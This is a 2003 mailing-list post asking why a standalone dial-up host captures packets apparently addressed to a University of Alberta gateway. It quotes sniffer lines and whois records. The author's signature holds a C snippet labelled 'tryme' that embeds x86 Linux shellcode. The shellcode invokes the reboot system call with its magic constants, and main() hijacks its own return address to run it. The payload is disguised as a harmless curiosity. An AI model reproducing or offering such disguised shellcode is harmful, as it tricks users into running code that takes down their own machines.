Misrouted - once more - what happens?
I'm writing once more because of some strange behaviours I have reported
while analyzing incoming connections to my host.
As an introduction, I would like to explain: the host is connected directly to
the ISP via a ppp connection, there is no local subnet,
the server stands on its own, on a single modem connection (115500Kbp/sec).
Today's logs from the sniffer look pretty famous, all of 'em have something in
common - these are destination ports.
The 3 days of logging gave me a pretty huge file that was fully filled with
packets that _shouldn't arrive_ on my host, as I mentioned before. They come
from all over the world, starting at US, ending at JP. I won't put too much
here, I'll just put those most important(?) I think. I will base on packets
sent to Alberta - of course, the database file after 3 days grew incredibly,
that is why I show here a few examples:
1)
[14:38:13|6/7]55.52.0.2.1 > gsb04-0-1.gw.ualberta.ca.2 F (ttl 4,len 49320,id
5632,tos 1,ack:0)win 29702,chks: 26469
55.52.0.2 is known to be:
OrgName: DoD Network Information Center
OrgID: DNIC
Address: 7990 Science Applications Ct
Address: M/S CV 50
City: Vienna
StateProv: VA
PostalCode: 22183-7000
Country: US
Alberta is the Canadian university.
The source of the packet is known to me, but I would rather not show it publicly.
2)
[15:22:54|6/7]204.95.0.1.1 > gsb04-0-1.gw.ualberta.ca.4 F (ttl 5,len
49320,id 1024,tos 1,ack:1)win 624,chks: 27648
204.95.0.1 appears to be:
OrgName: Sprint
OrgID: SPRN
Address: 12502 Sunrise Valley Dr.
City: Reston
StateProv: VA
PostalCode: 20196
Country: US
Another unlucky packet sent to Alberta?
And so on, with other ones..
All I want to ask is how it is possible that those packets are caught by
me; is there a possibility that somewhere the router is misconfigured and
they arrive at a lonely host??
With respect.
/* http://ipe.ath.cx/ Paweł Stochliński*/
int gg=2456829; /* gadugadu */
char tryme[] =
"\xeb\x16\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19"
"\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xe8\xe5\xff\xff\xff";
void main(){ int *ret; ret = (int *)&ret + 2; (*ret) = (int)tryme;}
Received on Tue Jul 8 12:03:46 2003